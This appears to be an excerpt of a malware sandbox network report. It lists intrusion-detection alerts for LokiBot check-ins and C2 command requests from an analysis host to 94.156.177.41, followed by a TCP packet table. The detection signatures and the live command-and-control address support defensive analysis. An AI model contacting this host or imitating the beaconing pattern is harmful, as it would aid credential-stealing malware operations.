2025-01-10T23:40:57.158429+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50076	94.156.177.41	80	TCP
2025-01-10T23:40:57.158429+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50076	94.156.177.41	80	TCP
2025-01-10T23:40:57.853599+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50076	94.156.177.41	80	TCP
2025-01-10T23:40:57.853599+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50076	94.156.177.41	80	TCP
2025-01-10T23:40:58.050721+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50077	94.156.177.41	80	TCP
2025-01-10T23:40:58.050721+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50077	94.156.177.41	80	TCP
2025-01-10T23:40:58.050721+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50077	94.156.177.41	80	TCP
2025-01-10T23:40:58.781456+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50077	94.156.177.41	80	TCP
2025-01-10T23:40:58.781456+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50077	94.156.177.41	80	TCP
2025-01-10T23:40:58.937068+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50078	94.156.177.41	80	TCP
2025-01-10T23:40:58.937068+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50078	94.156.177.41	80	TCP
2025-01-10T23:40:58.937068+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50078	94.156.177.41	80	TCP
2025-01-10T23:40:59.653370+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50078	94.156.177.41	80	TCP
2025-01-10T23:40:59.653370+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50078	94.156.177.41	80	TCP
2025-01-10T23:40:59.854825+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50079	94.156.177.41	80	TCP
2025-01-10T23:40:59.854825+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50079	94.156.177.41	80	TCP
2025-01-10T23:40:59.854825+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50079	94.156.177.41	80	TCP
2025-01-10T23:41:00.555619+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50079	94.156.177.41	80	TCP
2025-01-10T23:41:00.555619+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50079	94.156.177.41	80	TCP
2025-01-10T23:41:00.709875+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50080	94.156.177.41	80	TCP
2025-01-10T23:41:00.709875+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50080	94.156.177.41	80	TCP
2025-01-10T23:41:00.709875+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50080	94.156.177.41	80	TCP
2025-01-10T23:41:01.439251+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50080	94.156.177.41	80	TCP
2025-01-10T23:41:01.439251+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50080	94.156.177.41	80	TCP
2025-01-10T23:41:01.612216+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50081	94.156.177.41	80	TCP
2025-01-10T23:41:01.612216+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50081	94.156.177.41	80	TCP
2025-01-10T23:41:01.612216+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50081	94.156.177.41	80	TCP
2025-01-10T23:41:02.325275+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50081	94.156.177.41	80	TCP
2025-01-10T23:41:02.325275+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50081	94.156.177.41	80	TCP
2025-01-10T23:41:02.611717+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50082	94.156.177.41	80	TCP
2025-01-10T23:41:02.611717+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50082	94.156.177.41	80	TCP
2025-01-10T23:41:02.611717+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50082	94.156.177.41	80	TCP
2025-01-10T23:41:02.816240+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50082	94.156.177.41	80	TCP
2025-01-10T23:41:02.816240+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.9	50082	94.156.177.41	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 23:39:30.020951033 CET	49775	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:30.025789022 CET	80	49775	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:30.025859118 CET	49775	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:30.028404951 CET	49775	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:30.033166885 CET	80	49775	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:30.033216953 CET	49775	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:30.037975073 CET	80	49775	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:30.747435093 CET	80	49775	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:30.747503042 CET	80	49775	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:30.747575045 CET	49775	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:30.747668982 CET	49775	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:30.752484083 CET	80	49775	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:30.970520973 CET	49782	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:30.975553989 CET	80	49782	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:30.975668907 CET	49782	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:30.978722095 CET	49782	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:30.983511925 CET	80	49782	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:30.983573914 CET	49782	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:30.988348961 CET	80	49782	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:31.697825909 CET	80	49782	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:31.698158979 CET	49782	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:31.698791981 CET	80	49782	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:31.698832035 CET	49782	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:31.703094959 CET	80	49782	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:31.774080992 CET	49789	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:31.779058933 CET	80	49789	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:31.779165983 CET	49789	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:31.781302929 CET	49789	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:31.786119938 CET	80	49789	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:31.786335945 CET	49789	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:31.791090012 CET	80	49789	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:32.526202917 CET	80	49789	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:32.526284933 CET	80	49789	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:32.526293993 CET	49789	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:32.526330948 CET	49789	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:32.531080008 CET	80	49789	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:32.751097918 CET	49795	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:32.755932093 CET	80	49795	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:32.756007910 CET	49795	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:32.758107901 CET	49795	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:32.762871981 CET	80	49795	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:32.762985945 CET	49795	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:32.767791033 CET	80	49795	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:33.496758938 CET	80	49795	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:33.496787071 CET	80	49795	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:33.496856928 CET	49795	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:33.496932983 CET	49795	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:33.501672029 CET	80	49795	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:33.656400919 CET	49802	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:33.661361933 CET	80	49802	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:33.661475897 CET	49802	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:33.663940907 CET	49802	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:33.668741941 CET	80	49802	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:33.668904066 CET	49802	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:33.673691988 CET	80	49802	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:34.373302937 CET	80	49802	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:34.373431921 CET	80	49802	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:34.373549938 CET	49802	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:34.373747110 CET	49802	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:34.378526926 CET	80	49802	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:34.537683010 CET	49808	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:34.542511940 CET	80	49808	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:34.542593956 CET	49808	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:34.545631886 CET	49808	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:34.550606966 CET	80	49808	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:34.550687075 CET	49808	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:34.556621075 CET	80	49808	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:35.278659105 CET	80	49808	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:35.278795004 CET	49808	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:35.278806925 CET	80	49808	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:35.278929949 CET	49808	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:35.283658028 CET	80	49808	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:35.427397013 CET	49814	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:35.586416960 CET	80	49814	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:35.586517096 CET	49814	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:35.589103937 CET	49814	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:35.593918085 CET	80	49814	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:35.593981981 CET	49814	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:35.598833084 CET	80	49814	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:36.347835064 CET	80	49814	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:36.347953081 CET	80	49814	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:36.347969055 CET	49814	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:36.348021030 CET	49814	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:36.352790117 CET	80	49814	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:36.512960911 CET	49824	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:36.517878056 CET	80	49824	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:36.517980099 CET	49824	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:36.520096064 CET	49824	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:36.524905920 CET	80	49824	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:36.524976969 CET	49824	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:36.529855967 CET	80	49824	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:37.274755001 CET	80	49824	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:37.274890900 CET	80	49824	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:37.275029898 CET	49824	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:37.275029898 CET	49824	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:37.279961109 CET	80	49824	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:37.458153009 CET	49829	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:37.463067055 CET	80	49829	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:37.463219881 CET	49829	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:37.470155001 CET	49829	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:37.475014925 CET	80	49829	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:37.475403070 CET	49829	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:37.480243921 CET	80	49829	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:38.209392071 CET	80	49829	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:38.209466934 CET	80	49829	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:38.209511042 CET	49829	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:38.209985971 CET	49829	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:38.214368105 CET	80	49829	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:38.356976032 CET	49836	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:38.361845016 CET	80	49836	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:38.361922026 CET	49836	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:38.364016056 CET	49836	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:38.368818998 CET	80	49836	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:38.368871927 CET	49836	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:38.373605967 CET	80	49836	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:39.065548897 CET	80	49836	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:39.065630913 CET	80	49836	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:39.065650940 CET	49836	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:39.065675020 CET	49836	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:39.070466995 CET	80	49836	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:39.242185116 CET	49842	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:39.247545958 CET	80	49842	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:39.247622013 CET	49842	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:39.250117064 CET	49842	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:39.255018950 CET	80	49842	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:39.255079985 CET	49842	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:39.260813951 CET	80	49842	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:39.983952045 CET	80	49842	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:39.984096050 CET	49842	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:39.984112024 CET	80	49842	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:39.984160900 CET	49842	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:39.988900900 CET	80	49842	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:40.168689966 CET	49848	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:40.173641920 CET	80	49848	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:40.173743963 CET	49848	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:40.176057100 CET	49848	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:40.180843115 CET	80	49848	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:40.181219101 CET	49848	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:40.186115026 CET	80	49848	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:40.887561083 CET	80	49848	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:40.887725115 CET	49848	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:40.887762070 CET	80	49848	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:40.888016939 CET	49848	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:40.892633915 CET	80	49848	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:41.031924009 CET	49856	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:41.036813021 CET	80	49856	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:41.036885023 CET	49856	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:41.038975954 CET	49856	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:41.043782949 CET	80	49856	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:41.043838024 CET	49856	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:41.048595905 CET	80	49856	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:41.794558048 CET	80	49856	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:41.794575930 CET	80	49856	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:41.794660091 CET	49856	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:41.794728994 CET	49856	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:41.799927950 CET	80	49856	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:41.934288979 CET	49864	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:41.939251900 CET	80	49864	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:41.939333916 CET	49864	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:41.941503048 CET	49864	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:41.946307898 CET	80	49864	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:41.946366072 CET	49864	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:41.951174974 CET	80	49864	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:42.649466038 CET	80	49864	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:42.649580956 CET	80	49864	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:42.649679899 CET	49864	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:42.649713039 CET	49864	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:42.654508114 CET	80	49864	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:42.792653084 CET	49870	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:42.797611952 CET	80	49870	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:42.797717094 CET	49870	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:42.799732924 CET	49870	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:42.804569006 CET	80	49870	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:42.804637909 CET	49870	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:42.809463978 CET	80	49870	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:43.541203976 CET	80	49870	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:43.541237116 CET	80	49870	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:43.541295052 CET	49870	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:43.541418076 CET	49870	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:43.546164989 CET	80	49870	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:43.688004971 CET	49876	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:43.693129063 CET	80	49876	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:43.693211079 CET	49876	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:43.695342064 CET	49876	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:43.700158119 CET	80	49876	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:43.700208902 CET	49876	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:43.705025911 CET	80	49876	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:44.408473969 CET	80	49876	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:44.408499956 CET	80	49876	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:44.408571005 CET	49876	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:44.412071943 CET	49876	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:44.416852951 CET	80	49876	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:44.559417009 CET	49881	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:44.564419031 CET	80	49881	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:44.564512968 CET	49881	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:44.566682100 CET	49881	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:44.571494102 CET	80	49881	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:44.571655989 CET	49881	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:44.576500893 CET	80	49881	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:45.289796114 CET	80	49881	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:45.289892912 CET	80	49881	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:45.290090084 CET	49881	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:45.290551901 CET	49881	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:45.297764063 CET	80	49881	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:45.455668926 CET	49886	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:45.460649014 CET	80	49886	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:45.460742950 CET	49886	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:45.463067055 CET	49886	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:45.467854977 CET	80	49886	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:45.467958927 CET	49886	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:45.475157022 CET	80	49886	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:46.178901911 CET	80	49886	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:46.179028034 CET	49886	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:46.179162025 CET	80	49886	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:46.179219961 CET	49886	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:46.183860064 CET	80	49886	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:46.335361004 CET	49892	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:46.340348959 CET	80	49892	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:46.340424061 CET	49892	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:46.343111038 CET	49892	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:46.347860098 CET	80	49892	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:46.347913980 CET	49892	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:46.352758884 CET	80	49892	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:47.050214052 CET	80	49892	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:47.050321102 CET	49892	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:47.050410986 CET	80	49892	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:47.050471067 CET	49892	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:47.055053949 CET	80	49892	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:47.212784052 CET	49901	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:47.217731953 CET	80	49901	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:47.217834949 CET	49901	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:47.219922066 CET	49901	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:47.224811077 CET	80	49901	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:47.224864960 CET	49901	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:47.229734898 CET	80	49901	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:47.937546015 CET	80	49901	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:47.937644005 CET	49901	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:47.937655926 CET	80	49901	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:47.937711954 CET	49901	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:47.942400932 CET	80	49901	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:48.073344946 CET	49908	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:48.078306913 CET	80	49908	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:48.078392029 CET	49908	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:48.080744028 CET	49908	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:48.085500002 CET	80	49908	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:48.085556984 CET	49908	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:48.090413094 CET	80	49908	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:48.806724072 CET	80	49908	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:48.806821108 CET	80	49908	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:48.806843042 CET	49908	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:48.807123899 CET	49908	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:48.811589956 CET	80	49908	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:48.954195976 CET	49914	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:48.959153891 CET	80	49914	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:48.959445953 CET	49914	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:48.961575031 CET	49914	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:48.966787100 CET	80	49914	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:48.966901064 CET	49914	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:48.971721888 CET	80	49914	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:49.665724039 CET	80	49914	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:49.665745020 CET	80	49914	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:49.665812969 CET	49914	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:49.665858030 CET	49914	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:49.670676947 CET	80	49914	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:49.844297886 CET	49920	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:49.849092007 CET	80	49920	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:49.849169970 CET	49920	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:49.851892948 CET	49920	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:49.857146978 CET	80	49920	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:49.857188940 CET	49920	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:49.862329006 CET	80	49920	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:50.574955940 CET	80	49920	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:50.575089931 CET	80	49920	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:50.575156927 CET	49920	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:50.575361013 CET	49920	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:50.580471039 CET	80	49920	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:50.724656105 CET	49926	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:50.729521990 CET	80	49926	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:50.729604006 CET	49926	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:50.731688023 CET	49926	80	192.168.2.9	94.156.177.41
Jan 10, 2025 23:39:50.736511946 CET	80	49926	94.156.177.41	192.168.2.9
Jan 10, 2025 23:39:50.736563921 CET	49926	80	192.168.2.9	94.156.177.41
